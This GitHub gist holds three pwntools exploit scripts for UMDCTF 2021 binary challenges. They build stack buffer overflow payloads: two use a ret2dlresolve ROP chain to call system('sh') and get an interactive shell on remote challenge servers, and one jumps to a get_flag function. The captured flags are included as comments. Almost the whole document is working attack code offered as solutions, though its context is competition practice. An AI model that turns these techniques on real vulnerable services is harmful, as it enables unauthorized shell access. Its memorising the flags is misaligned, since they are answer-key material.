Skip to content

Instantly share code, notes, and snippets.

@Error-200

Error-200/jie.py

Last active April 19, 2021 21:26
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Error-200/3d5ba9568402f88a25c19dd818cd5fbe to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Error-200/3d5ba9568402f88a25c19dd818cd5fbe to your computer and use it in GitHub Desktop.
Download ZIP
My exploits for UMDCTF 2021
Raw
jie.py
from pwn import *
binary = context.binary = ELF('./JIE')
rop = ROP(binary)
ret = rop.find_gadget(['ret'])[0]
dl = Ret2dlresolvePayload(binary, symbol='system', args=['sh'])
rop.raw(ret)
rop.gets(dl.data_addr)
rop.ret2dlresolve(dl)
# if args.REMOTE:
p = remote('chals5.umdctf.io',7001)
# else:
# p = process(binary.path)
payload = b''
payload += 0x48 * b'A'
payload += rop.chain()
payload += b'\n'
payload += dl.payload
p.sendline(payload)
p.interactive()
# you can also use ret2libc but i first solved JNW the same xploits works for this :)
#UMDCTF-{Sh311c0d3_1s_The_B35T_p14c3_70_jump_70}
Raw
jne.py
from pwn import *
binary = context.binary = ELF('./JNE')
#p = process(binary.path)
p = remote('chals5.umdctf.io', 7003)
payload = b''
payload += b'A' * 0x48
payload += p64(binary.sym.get_flag)
p.sendlineafter('Where do you want to go?\n',payload)
p.interactive()
#UMDCTF-{wh323_423_WE_G01n9_n3xt?}
Raw
jnw.py
from pwn import *
binary = context.binary = ELF('./JNW')
rop = ROP(binary)
ret = rop.find_gadget(['ret'])[0]
dl = Ret2dlresolvePayload(binary, symbol='system', args=['sh'])
rop.raw(ret)
rop.gets(dl.data_addr)
rop.ret2dlresolve(dl)
p = remote('chals5.umdctf.io',7005)
#p = process(binary.path)
payload = b''
payload += 0x48 * b'A'
payload += rop.chain()
payload += b'\n'
payload += dl.payload
p.sendline(payload)
p.interactive()
#UMDCTF-{JuMp_1s_N0w_w0RK1nG}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment